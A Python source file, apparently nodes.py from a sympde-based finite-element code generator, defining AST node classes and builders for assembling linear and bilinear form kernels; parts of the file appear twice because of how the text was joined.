return Basic.__new__(cls, target, positions, lengths)
@property
def target(self):
return self._args[0]
@property
def positions(self):
return self._args[1]
@property
def lengths(self):
return self._args[2]
#==============================================================================
def construct_logical_expressions(u, nderiv):
dim = u.space.ldim
ops = [dx1, dx2, dx3][:dim]
r = range(nderiv+1)
ranges = [r]*dim
indices = product(*ranges)
indices = list(indices)
indices = [ijk for ijk in indices if sum(ijk) <= nderiv]
args = []
for ijk in indices:
atom = u
for n,op in zip(ijk, ops):
for i in range(1, n+1):
atom = op(atom)
args.append(atom)
return [ComputeLogicalBasis(i) for i in args]
#==============================================================================
class GeometryExpressions(Basic):
"""
"""
def __new__(cls, M, nderiv):
dim = M.rdim
ops = [dx1, dx2, dx3][:dim]
r = range(nderiv+1)
ranges = [r]*dim
indices = product(*ranges)
indices = list(indices)
indices = [ijk for ijk in indices if sum(ijk) <= nderiv]
args = []
for d in range(dim):
for ijk in indices:
atom = M[d]
for n,op in zip(ijk, ops):
for i in range(1, n+1):
atom = op(atom)
args.append(atom)
args = [GeometryExpr(i) for i in args]
args = Tuple(*args)
return Basic.__new__(cls, args)
@property
def arguments(self):
return self._args[0]
#==============================================================================
def construct_itergener(a, index):
"""
"""
# ... create generator
if isinstance(a, GlobalTensorQuadrature):
generator = TensorGenerator(a, index)
element = LocalTensorQuadrature()
elif isinstance(a, LocalTensorQuadrature):
generator = TensorGenerator(a, index)
element = TensorQuadrature()
elif isinstance(a, GlobalTensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureTrialBasis(a.target)
elif isinstance(a, LocalTensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureTrialBasis(a.target)
elif isinstance(a, TensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = TensorTrialBasis(a.target)
elif isinstance(a, GlobalTensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureTestBasis(a.target)
elif isinstance(a, LocalTensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureTestBasis(a.target)
elif isinstance(a, TensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = TensorTestBasis(a.target)
elif isinstance(a, GlobalTensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureBasis(a.target)
elif isinstance(a, LocalTensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureBasis(a.target)
elif isinstance(a, TensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = TensorBasis(a.target)
elif isinstance(a, GlobalSpan):
generator = TensorGenerator(a, index)
element = Span(a.target)
elif isinstance(a, MatrixLocalBasis):
generator = ProductGenerator(a, index)
element = CoefficientBasis(a.target)
elif isinstance(a, GeometryExpr):
generator = ProductGenerator(a.expr, index)
element = a.atom
else:
raise TypeError('{} not available'.format(type(a)))
# ...
# ... create iterator
if isinstance(element, LocalTensorQuadrature):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadrature):
iterator = TensorIterator(element)
elif isinstance(element, LocalTensorQuadratureTrialBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureTrialBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorTrialBasis):
iterator = TensorIterator(element)
elif isinstance(element, LocalTensorQuadratureTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, LocalTensorQuadratureBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorBasis):
iterator = TensorIterator(element)
elif isinstance(element, Span):
iterator = TensorIterator(element)
elif isinstance(element, CoefficientBasis):
iterator = ProductIterator(element)
elif isinstance(element, GeometryAtom):
iterator = ProductIterator(element)
else:
raise TypeError('{} not available'.format(type(element)))
# ...
return iterator, generator
#==============================================================================
class Block(Basic):
"""
"""
def __new__(cls, body):
if not isinstance(body, (list, tuple, Tuple)):
body = [body]
body = Tuple(*body)
return Basic.__new__(cls, body)
@property
def body(self):
return self._args[0]
#==============================================================================
def is_scalar_field(expr):
if isinstance(expr, _partial_derivatives):
return is_scalar_field(expr.args[0])
elif isinstance(expr, _logical_partial_derivatives):
return is_scalar_field(expr.args[0])
elif isinstance(expr, ScalarField):
return True
return False
#==============================================================================
def is_vector_field(expr):
if isinstance(expr, _partial_derivatives):
return is_vector_field(expr.args[0])
elif isinstance(expr, _logical_partial_derivatives):
return is_vector_field(expr.args[0])
elif isinstance(expr, (VectorField, IndexedVectorField)):
return True
return False
#==============================================================================
from sympy import Matrix, ImmutableDenseMatrix
from sympy import symbols
from pyccel.ast.core import _atomic
from sympde.expr import TerminalExpr
from sympde.expr import LinearForm
from sympde.expr import BilinearForm
from sympde.topology import element_of
from sympde.topology import ScalarField
from sympde.topology import VectorField, IndexedVectorField
from sympde.topology.space import ScalarTestFunction
from sympde.topology.space import VectorTestFunction
from sympde.topology.space import IndexedTestTrial
from sympde.topology.derivatives import _partial_derivatives
from sympde.topology.derivatives import _logical_partial_derivatives
from sympde.topology.derivatives import get_max_partial_derivatives
class AST(object):
"""
"""
def __init__(self, expr):
# ... compute terminal expr
# TODO check that we have one single domain/interface/boundary
terminal_expr = TerminalExpr(expr)
domain = terminal_expr[0].target
terminal_expr = terminal_expr[0].expr
# print('> terminal expr = ', terminal_expr)
# ...
# ... compute max deriv
nderiv = 0
if isinstance(terminal_expr, Matrix):
n_rows, n_cols = terminal_expr.shape
for i_row in range(0, n_rows):
for i_col in range(0, n_cols):
d = get_max_partial_derivatives(terminal_expr[i_row,i_col])
nderiv = max(nderiv, max(d.values()))
else:
d = get_max_partial_derivatives(terminal_expr)
nderiv = max(nderiv, max(d.values()))
# print('> nderiv = ', nderiv)
# ...
# ...
is_bilinear = False
is_linear = False
is_functional = False
tests = []
trials = []
if isinstance(expr, LinearForm):
is_linear = True
tests = expr.test_functions
elif isinstance(expr, BilinearForm):
is_bilinear = True
tests = expr.test_functions
trials = expr.trial_functions
else:
raise NotImplementedError('TODO')
# ...
# ...
atoms_types = (_partial_derivatives,
VectorTestFunction,
ScalarTestFunction,
IndexedTestTrial,
ScalarField,
VectorField, IndexedVectorField)
atoms = _atomic(expr, cls=atoms_types)
# ...
# ...
atomic_expr_field = [atom for atom in atoms if is_scalar_field(atom)]
atomic_expr_vector_field = [atom for atom in atoms if is_vector_field(atom)]
atomic_expr = [atom for atom in atoms if not( atom in atomic_expr_field ) and
not( atom in atomic_expr_vector_field)]
# ...
# ...
d_tests = {}
for v in tests:
d = {}
d['global'] = GlobalTensorQuadratureTestBasis(v)
d['local'] = LocalTensorQuadratureTestBasis(v)
d['array'] = TensorQuadratureTestBasis(v)
d['basis'] = TensorTestBasis(v)
d['span'] = GlobalSpan(v)
d_tests[v] = d
# ...
# ...
d_trials = {}
for v in trials:
d = {}
d['global'] = GlobalTensorQuadratureTrialBasis(v)
d['local'] = LocalTensorQuadratureTrialBasis(v)
d['array'] = TensorQuadratureTrialBasis(v)
d['basis'] = TensorTrialBasis(v)
d['span'] = GlobalSpan(v)
d_trials[v] = d
# ...
# ...
if is_linear:
ast = _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests,
nderiv, domain.dim)
elif is_bilinear:
ast = _create_ast_bilinear_form(terminal_expr, atomic_expr,
tests, d_tests,
trials, d_trials,
nderiv, domain.dim)
else:
raise NotImplementedError('TODO')
# ...
self._expr = ast
self._nderiv = nderiv
self._domain = domain
@property
def expr(self):
return self._expr
@property
def nderiv(self):
return self._nderiv
@property
def domain(self):
return self._domain
@property
def dim(self):
return self.domain.dim
#==============================================================================
def _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests, nderiv, dim):
"""
"""
pads = symbols('p1, p2, p3')[:dim]
g_quad = GlobalTensorQuadrature()
l_quad = LocalTensorQuadrature()
# ...
stmts = []
for v in tests:
stmts += construct_logical_expressions(v, nderiv)
stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
# ...
# ...
a_basis = tuple([d['array'] for v,d in d_tests.items()])
loop = Loop((l_quad, *a_basis), index_quad, stmts)
# ...
# ... TODO
l_vec = StencilVectorLocalBasis(pads)
# ...
# ...
loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_vec), loop)
# ...
# ... loop over tests
l_basis = tuple([d['local'] for v,d in d_tests.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_test, stmts)
# ...
# ... TODO
body = (Reset(l_vec), loop)
stmts = Block(body)
# ...
# ...
g_basis = tuple([d['global'] for v,d in d_tests.items()])
g_span = tuple([d['span'] for v,d in d_tests.items()])
loop = Loop((g_quad, *g_basis, *g_span), index_element, stmts)
# ...
# ... TODO
g_vec = StencilVectorGlobalBasis(pads)
# ...
# ... TODO
body = (Reset(g_vec), Reduce('+', l_vec, g_vec, loop))
stmt = Block(body)
# ...
return stmt
#==============================================================================
def _create_ast_bilinear_form(terminal_expr, atomic_expr,
tests, d_tests,
trials, d_trials,
nderiv, dim):
"""
"""
pads = symbols('p1, p2, p3')[:dim]
g_quad = GlobalTensorQuadrature()
l_quad = LocalTensorQuadrature()
# ...
stmts = []
for v in tests:
stmts += construct_logical_expressions(v, nderiv)
stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
# ...
# ...
a_basis_tests = tuple([d['array'] for v,d in d_tests.items()])
a_basis_trials = tuple([d['array'] for v,d in d_trials.items()])
loop = Loop((l_quad, *a_basis_tests, *a_basis_trials), index_quad, stmts)
# ...
# ... TODO
l_mat = StencilMatrixLocalBasis(pads)
# ...
# ...
loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_mat), loop)
# ...
# ... loop over trials
l_basis = tuple([d['local'] for v,d in d_trials.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_trial, stmts)
# ...
# ... loop over tests
l_basis = tuple([d['local'] for v,d in d_tests.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_test, stmts)
# ...
# ... TODO
body = (Reset(l_mat), loop)
stmts = Block(body)
# ...
# ...
g_basis_tests = tuple([d['global'] for v,d in d_tests.items()])
g_basis_trials = tuple([d['global'] for v,d in d_trials.items()])
# TODO d_trials or d_tests here?
g_span = tuple([d['span'] for v,d in d_trials.items()])
loop = Loop((g_quad, *g_basis_tests, *g_basis_trials, *g_span),
index_element, stmts)
# ...
# ... TODO
g_mat = StencilMatrixGlobalBasis(pads)
# ...
# ... TODO
body = (Reset(g_mat), Reduce('+', l_mat, g_mat, loop))
stmt = Block(body)
# ...
return stmt | nodes.py | from collections import OrderedDict
from itertools import product
from sympy import Basic
from sympy.core.singleton import Singleton
from sympy.core.compatibility import with_metaclass
from sympy.core.containers import Tuple
from sympy import AtomicExpr
from sympde.topology import ScalarTestFunction, VectorTestFunction
from sympde.topology import (dx1, dx2, dx3)
from sympde.topology import Mapping
from sympde.topology import SymbolicDeterminant
from sympde.topology import SymbolicInverseDeterminant
from sympde.topology import SymbolicWeightedVolume
from sympde.topology import IdentityMapping
#==============================================================================
# TODO move it
import string
import random
def random_string( n ):
chars = string.ascii_lowercase + string.digits
selector = random.SystemRandom()
return ''.join( selector.choice( chars ) for _ in range( n ) )
#==============================================================================
class ArityType(with_metaclass(Singleton, Basic)):
"""Base class representing a form type: bilinear/linear/functional"""
pass
class BilinearArity(ArityType):
pass
class LinearArity(ArityType):
pass
class FunctionalArity(ArityType):
pass
#==============================================================================
class IndexNode(with_metaclass(Singleton, Basic)):
"""Base class representing one index of an iterator"""
pass
class IndexElement(IndexNode):
pass
class IndexQuadrature(IndexNode):
pass
class IndexDof(IndexNode):
pass
class IndexDofTrial(IndexNode):
pass
class IndexDofTest(IndexNode):
pass
class IndexDerivative(IndexNode):
pass
index_element = IndexElement()
index_quad = IndexQuadrature()
index_dof = IndexDof()
index_dof_trial = IndexDofTrial()
index_dof_test = IndexDofTest()
index_deriv = IndexDerivative()
#==============================================================================
class LengthNode(with_metaclass(Singleton, Basic)):
"""Base class representing one length of an iterator"""
pass
class LengthElement(LengthNode):
pass
class LengthQuadrature(LengthNode):
pass
class LengthDof(LengthNode):
pass
class LengthDofTrial(LengthNode):
pass
class LengthDofTest(LengthNode):
pass
length_element = LengthElement()
length_quad = LengthQuadrature()
length_dof = LengthDof()
length_dof_trial = LengthDofTrial()
length_dof_test = LengthDofTest()
#==============================================================================
class RankNode(with_metaclass(Singleton, Basic)):
"""Base class representing a rank of an iterator"""
pass
class RankDimension(RankNode):
pass
rank_dim = RankDimension()
#==============================================================================
class BaseNode(Basic):
"""
"""
pass
#==============================================================================
class Element(BaseNode):
"""
"""
pass
#==============================================================================
class Pattern(Tuple):
"""
"""
pass
#==============================================================================
class IteratorBase(BaseNode):
"""
"""
def __new__(cls, target, dummies=None):
if not dummies is None:
if not isinstance(dummies, (list, tuple, Tuple)):
dummies = [dummies]
dummies = Tuple(*dummies)
return Basic.__new__(cls, target, dummies)
@property
def target(self):
return self._args[0]
@property
def dummies(self):
return self._args[1]
#==============================================================================
class TensorIterator(IteratorBase):
pass
#==============================================================================
class ProductIterator(IteratorBase):
pass
#==============================================================================
# TODO dummies should not be None
class GeneratorBase(BaseNode):
"""
"""
def __new__(cls, target, dummies):
if not isinstance(dummies, (list, tuple, Tuple)):
dummies = [dummies]
dummies = Tuple(*dummies)
if not isinstance(target, (ArrayNode, MatrixNode)):
raise TypeError('expecting an ArrayNode')
return Basic.__new__(cls, target, dummies)
@property
def target(self):
return self._args[0]
@property
def dummies(self):
return self._args[1]
#==============================================================================
class TensorGenerator(GeneratorBase):
pass
#==============================================================================
class ProductGenerator(GeneratorBase):
pass
#==============================================================================
class Grid(BaseNode):
"""
"""
pass
#==============================================================================
class ScalarNode(BaseNode, AtomicExpr):
"""
"""
pass
#==============================================================================
class ArrayNode(BaseNode, AtomicExpr):
"""
"""
_rank = None
_positions = None
_free_positions = None
@property
def rank(self):
return self._rank
@property
def positions(self):
return self._positions
@property
def free_positions(self):
if self._free_positions is None:
return list(self.positions.keys())
else:
return self._free_positions
def pattern(self, args=None):
if args is None:
args = self.free_positions
positions = {}
for a in args:
positions[a] = self.positions[a]
args = [None]*self.rank
for k,v in positions.items():
args[v] = k
return Pattern(*args)
#==============================================================================
class MatrixNode(BaseNode, AtomicExpr):
"""
"""
_rank = None
@property
def rank(self):
return self._rank
def pattern(self, positions):
raise NotImplementedError('TODO')
#==============================================================================
class GlobalTensorQuadrature(ArrayNode):
"""
"""
_rank = 2
_positions = {index_element: 0, index_quad: 1}
_free_positions = [index_element]
#==============================================================================
class LocalTensorQuadrature(ArrayNode):
# TODO add set_positions
"""
"""
_rank = 1
_positions = {index_quad: 0}
#==============================================================================
class TensorQuadrature(ScalarNode):
"""
"""
pass
#==============================================================================
class MatrixQuadrature(MatrixNode):
"""
"""
_rank = rank_dim
def __new__(cls, target):
# TODO check target
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class WeightedVolumeQuadrature(ScalarNode):
"""
"""
pass
#==============================================================================
class GlobalTensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 4
_positions = {index_quad: 3, index_deriv: 2, index_dof: 1, index_element: 0}
_free_positions = [index_element]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class LocalTensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 3
_positions = {index_quad: 2, index_deriv: 1, index_dof: 0}
_free_positions = [index_dof]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class TensorQuadratureBasis(ArrayNode):
"""
"""
_rank = 2
_positions = {index_quad: 1, index_deriv: 0}
_free_positions = [index_quad]
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class CoefficientBasis(ScalarNode):
"""
"""
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class TensorBasis(CoefficientBasis):
pass
#==============================================================================
class GlobalTensorQuadratureTestBasis(GlobalTensorQuadratureBasis):
_positions = {index_quad: 3, index_deriv: 2, index_dof_test: 1, index_element: 0}
#==============================================================================
class LocalTensorQuadratureTestBasis(LocalTensorQuadratureBasis):
_positions = {index_quad: 2, index_deriv: 1, index_dof_test: 0}
_free_positions = [index_dof_test]
#==============================================================================
class TensorQuadratureTestBasis(TensorQuadratureBasis):
pass
#==============================================================================
class TensorTestBasis(TensorBasis):
pass
#==============================================================================
class GlobalTensorQuadratureTrialBasis(GlobalTensorQuadratureBasis):
_positions = {index_quad: 3, index_deriv: 2, index_dof_trial: 1, index_element: 0}
#==============================================================================
class LocalTensorQuadratureTrialBasis(LocalTensorQuadratureBasis):
_positions = {index_quad: 2, index_deriv: 1, index_dof_trial: 0}
_free_positions = [index_dof_trial]
#==============================================================================
class TensorQuadratureTrialBasis(TensorQuadratureBasis):
pass
#==============================================================================
class TensorTrialBasis(TensorBasis):
pass
#==============================================================================
class MatrixLocalBasis(MatrixNode):
"""
used to describe local dof over an element
"""
_rank = rank_dim
def __new__(cls, target):
# TODO check target
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class StencilMatrixLocalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil matrix
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = 2*len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilVectorLocalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil vector
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilMatrixGlobalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil matrix
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = 2*len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class StencilVectorGlobalBasis(MatrixNode):
"""
used to describe local dof over an element as a stencil vector
"""
def __new__(cls, pads):
if not isinstance(pads, (list, tuple, Tuple)):
raise TypeError('Expecting an iterable')
pads = Tuple(*pads)
rank = len(pads)
tag = random_string( 6 )
return Basic.__new__(cls, pads, rank, tag)
@property
def pads(self):
return self._args[0]
@property
def rank(self):
return self._args[1]
@property
def tag(self):
return self._args[2]
#==============================================================================
class GlobalSpan(ArrayNode):
"""
"""
_rank = 1
_positions = {index_element: 0}
def __new__(cls, target):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class Span(ScalarNode):
"""
"""
def __new__(cls, target=None):
if not( target is None ):
if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
raise TypeError('Expecting a scalar/vector test function')
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class Evaluation(BaseNode):
"""
"""
pass
#==============================================================================
class FieldEvaluation(Evaluation):
"""
"""
pass
#==============================================================================
class MappingEvaluation(Evaluation):
"""
"""
pass
#==============================================================================
class ComputeNode(Basic):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class ComputePhysical(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputePhysicalBasis(ComputePhysical):
"""
"""
pass
#==============================================================================
class ComputeKernelExpr(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputeLogical(ComputeNode):
"""
"""
pass
#==============================================================================
class ComputeLogicalBasis(ComputeLogical):
"""
"""
pass
#==============================================================================
class Reduction(Basic):
"""
"""
def __new__(cls, op, expr, lhs=None):
# TODO add verification on op = '-', '+', '*', '/'
return Basic.__new__(cls, op, expr, lhs)
@property
def op(self):
return self._args[0]
@property
def expr(self):
return self._args[1]
@property
def lhs(self):
return self._args[2]
#==============================================================================
class Reduce(Basic):
"""
"""
def __new__(cls, op, rhs, lhs, loop):
# TODO add verification on op = '-', '+', '*', '/'
if not isinstance(loop, Loop):
raise TypeError('Expecting a Loop')
return Basic.__new__(cls, op, rhs, lhs, loop)
@property
def op(self):
return self._args[0]
@property
def rhs(self):
return self._args[1]
@property
def lhs(self):
return self._args[2]
@property
def loop(self):
return self._args[3]
#==============================================================================
class Reset(Basic):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class ElementOf(Basic):
"""
"""
def __new__(cls, target):
return Basic.__new__(cls, target)
@property
def target(self):
return self._args[0]
#==============================================================================
class ExprNode(Basic):
"""
"""
pass
#==============================================================================
class AtomicNode(ExprNode, AtomicExpr):
"""
"""
@property
def expr(self):
return self._args[0]
#==============================================================================
class ValueNode(ExprNode):
"""
"""
def __new__(cls, expr):
return Basic.__new__(cls, expr)
@property
def expr(self):
return self._args[0]
#==============================================================================
class PhysicalValueNode(ValueNode):
"""
"""
pass
#==============================================================================
class LogicalValueNode(ValueNode):
"""
"""
pass
#==============================================================================
class PhysicalBasisValue(PhysicalValueNode):
"""
"""
pass
#==============================================================================
class LogicalBasisValue(LogicalValueNode):
"""
"""
pass
#==============================================================================
class PhysicalGeometryValue(PhysicalValueNode):
"""
"""
pass
#==============================================================================
class LogicalGeometryValue(LogicalValueNode):
"""
"""
pass
#==============================================================================
class BasisAtom(AtomicNode):
"""
"""
def __new__(cls, expr):
ls = list(expr.atoms(ScalarTestFunction))
ls += list(expr.atoms(VectorTestFunction))
if not(len(ls) == 1):
print(expr, type(expr))
print(ls)
raise ValueError('Expecting an expression with one test function')
u = ls[0]
obj = Basic.__new__(cls, expr)
obj._atom = u
return obj
@property
def expr(self):
return self._args[0]
@property
def atom(self):
return self._atom
#==============================================================================
class GeometryAtom(AtomicNode):
"""
"""
def __new__(cls, expr):
ls = list(expr.atoms(Mapping))
if not(len(ls) == 1):
print(expr, type(expr))
print(ls)
raise ValueError('Expecting an expression with one mapping')
# TODO
u = ls[0]
obj = Basic.__new__(cls, expr)
obj._atom = u
return obj
@property
def expr(self):
return self._args[0]
@property
def atom(self):
return self._atom
#==============================================================================
class GeometryExpr(Basic):
"""
"""
def __new__(cls, expr):
# TODO assert on expr
atom = GeometryAtom(expr)
expr = MatrixQuadrature(expr)
return Basic.__new__(cls, atom, expr)
@property
def atom(self):
return self._args[0]
@property
def expr(self):
return self._args[1]
#==============================================================================
class Loop(BaseNode):
"""
class to describe a loop of an iterator over a generator.
"""
def __new__(cls, iterable, index, stmts=None):
# ...
if not( isinstance(iterable, (list, tuple, Tuple)) ):
iterable = [iterable]
iterable = Tuple(*iterable)
# ...
# ... replace GeometryExpressions by a list of expressions
others = [i for i in iterable if not isinstance(i, GeometryExpressions)]
geos = [i.arguments for i in iterable if isinstance(i, GeometryExpressions)]
with_geo = False # TODO remove
if len(geos) == 1:
geos = list(geos[0])
elif len(geos) > 1:
raise NotImplementedError('TODO')
iterable = others + geos
iterable = Tuple(*iterable)
# ...
# ...
if not( isinstance(index, IndexNode) ):
print(type(index), index)
raise TypeError('Expecting an index node')
# ...
# ... TODO - add assert w.r.t index type
# - this should be splitted/moved somewhere
iterator = []
generator = []
for a in iterable:
i,g = construct_itergener(a, index)
iterator.append(i)
generator.append(g)
# ...
# ...
iterator = Tuple(*iterator)
generator = Tuple(*generator)
# ...
# ...
if stmts is None:
stmts = []
elif not isinstance(stmts, (tuple, list, Tuple)):
stmts = [stmts]
stmts = Tuple(*stmts)
# ...
obj = Basic.__new__(cls, iterable, index, stmts)
obj._iterator = iterator
obj._generator = generator
return obj
@property
def iterable(self):
return self._args[0]
@property
def index(self):
return self._args[1]
@property
def stmts(self):
return self._args[2]
@property
def iterator(self):
return self._iterator
@property
def generator(self):
return self._generator
def get_geometry_stmts(self, mapping):
args = []
l_quad = list(self.generator.atoms(LocalTensorQuadrature))
if len(l_quad) == 0:
return Tuple(*args)
assert(len(l_quad) == 1)
l_quad = l_quad[0]
if isinstance(mapping, IdentityMapping):
args += [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
return Tuple(*args)
args += [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
# add stmts related to the geometry
# TODO add other expressions
args += [ComputeLogical(SymbolicDeterminant(mapping))]
args += [ComputeLogical(SymbolicInverseDeterminant(mapping))]
args += [ComputeLogical(SymbolicWeightedVolume(mapping))]
return Tuple(*args)
#==============================================================================
class TensorIteration(BaseNode):
"""
"""
def __new__(cls, iterator, generator):
# ...
if not( isinstance(iterator, TensorIterator) ):
raise TypeError('Expecting an TensorIterator')
if not( isinstance(generator, TensorGenerator) ):
raise TypeError('Expecting a TensorGenerator')
# ...
return Basic.__new__(cls, iterator, generator)
@property
def iterator(self):
return self._args[0]
@property
def generator(self):
return self._args[1]
#==============================================================================
class ProductIteration(BaseNode):
"""
"""
def __new__(cls, iterator, generator):
# ...
if not( isinstance(iterator, ProductIterator) ):
raise TypeError('Expecting an ProductIterator')
if not( isinstance(generator, ProductGenerator) ):
raise TypeError('Expecting a ProductGenerator')
# ...
return Basic.__new__(cls, iterator, generator)
@property
def iterator(self):
return self._args[0]
@property
def generator(self):
return self._args[1]
#==============================================================================
class SplitArray(BaseNode):
"""
"""
def __new__(cls, target, positions, lengths):
if not isinstance(positions, (list, tuple, Tuple)):
positions = [positions]
positions = Tuple(*positions)
if not isinstance(lengths, (list, tuple, Tuple)):
lengths = [lengths]
lengths = Tuple(*lengths)
return Basic.__new__(cls, target, positions, lengths)
@property
def target(self):
return self._args[0]
@property
def positions(self):
return self._args[1]
@property
def lengths(self):
return self._args[2]
#==============================================================================
def construct_logical_expressions(u, nderiv):
dim = u.space.ldim
ops = [dx1, dx2, dx3][:dim]
r = range(nderiv+1)
ranges = [r]*dim
indices = product(*ranges)
indices = list(indices)
indices = [ijk for ijk in indices if sum(ijk) <= nderiv]
args = []
for ijk in indices:
atom = u
for n,op in zip(ijk, ops):
for i in range(1, n+1):
atom = op(atom)
args.append(atom)
return [ComputeLogicalBasis(i) for i in args]
#==============================================================================
class GeometryExpressions(Basic):
"""
"""
def __new__(cls, M, nderiv):
dim = M.rdim
ops = [dx1, dx2, dx3][:dim]
r = range(nderiv+1)
ranges = [r]*dim
indices = product(*ranges)
indices = list(indices)
indices = [ijk for ijk in indices if sum(ijk) <= nderiv]
args = []
for d in range(dim):
for ijk in indices:
atom = M[d]
for n,op in zip(ijk, ops):
for i in range(1, n+1):
atom = op(atom)
args.append(atom)
args = [GeometryExpr(i) for i in args]
args = Tuple(*args)
return Basic.__new__(cls, args)
@property
def arguments(self):
return self._args[0]
#==============================================================================
def construct_itergener(a, index):
"""
"""
# ... create generator
if isinstance(a, GlobalTensorQuadrature):
generator = TensorGenerator(a, index)
element = LocalTensorQuadrature()
elif isinstance(a, LocalTensorQuadrature):
generator = TensorGenerator(a, index)
element = TensorQuadrature()
elif isinstance(a, GlobalTensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureTrialBasis(a.target)
elif isinstance(a, LocalTensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureTrialBasis(a.target)
elif isinstance(a, TensorQuadratureTrialBasis):
generator = TensorGenerator(a, index)
element = TensorTrialBasis(a.target)
elif isinstance(a, GlobalTensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureTestBasis(a.target)
elif isinstance(a, LocalTensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureTestBasis(a.target)
elif isinstance(a, TensorQuadratureTestBasis):
generator = TensorGenerator(a, index)
element = TensorTestBasis(a.target)
elif isinstance(a, GlobalTensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = LocalTensorQuadratureBasis(a.target)
elif isinstance(a, LocalTensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = TensorQuadratureBasis(a.target)
elif isinstance(a, TensorQuadratureBasis):
generator = TensorGenerator(a, index)
element = TensorBasis(a.target)
elif isinstance(a, GlobalSpan):
generator = TensorGenerator(a, index)
element = Span(a.target)
elif isinstance(a, MatrixLocalBasis):
generator = ProductGenerator(a, index)
element = CoefficientBasis(a.target)
elif isinstance(a, GeometryExpr):
generator = ProductGenerator(a.expr, index)
element = a.atom
else:
raise TypeError('{} not available'.format(type(a)))
# ...
# ... create iterator
if isinstance(element, LocalTensorQuadrature):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadrature):
iterator = TensorIterator(element)
elif isinstance(element, LocalTensorQuadratureTrialBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureTrialBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorTrialBasis):
iterator = TensorIterator(element)
